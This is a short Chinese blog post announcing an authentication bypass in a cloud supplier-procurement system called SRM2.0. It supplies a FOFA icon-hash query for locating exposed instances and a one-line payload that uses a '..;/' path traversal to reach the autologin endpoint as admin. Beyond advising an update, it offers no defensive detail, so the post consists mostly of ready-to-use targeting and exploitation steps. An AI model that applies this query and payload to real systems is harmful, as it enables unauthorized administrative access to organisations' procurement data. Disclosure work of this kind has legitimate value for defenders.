某云彩SRM2.0后台绕过漏洞

扣脚大汉在网络2024-09-06 16:01

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统在autologin接口处存在权限绕过漏洞

漏洞复现

payload

复制代码 
http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin

修复建议

更新到最新版本

相关推荐
菩提小狗1 天前
每日安全情报报告 · 2026-04-30
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗2 天前
每日安全情报报告 · 2026-04-27
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗2 天前
每日安全情报报告 · 2026-04-29
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗4 天前
每日安全情报报告 · 2026-04-24
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗7 天前
每日安全情报报告 · 2026-04-25
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗8 天前
每日安全情报报告 · 2026-04-23
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗9 天前
每日安全情报报告 · 2026-04-22
网络安全·漏洞·cve·安全情报·每日安全
智擎软件测评小祺9 天前
专业漏洞检测报告:精准定位风险快速修复
漏洞·检测·漏洞检测·cma·第三方检测·cnas·漏洞检测报告
智擎软件测评小祺9 天前
漏洞扫描测试报告:全面排查系统安全隐患
漏洞·漏洞扫描·cma·第三方检测·cnas·漏洞扫描测试报告
菩提小狗10 天前
每日安全情报报告 · 2026-04-21
网络安全·漏洞·cve·安全情报·每日安全
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03裂开!ChatGPT 居然开始要手机号验证,附详细解决方法04Codex 接入 DeepSeek API 完整配置文档05【AI】2026 年具身智能模型和世界模型总结06实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲07零基础教你claude code 接入 deepseek V4082026年4月AI大事件深度解读:大模型竞争进入“深水区“09在Windows 11上安装Docker的踩坑记录102026年AI前瞻:量子AI、具身智能与科学发现的新纪元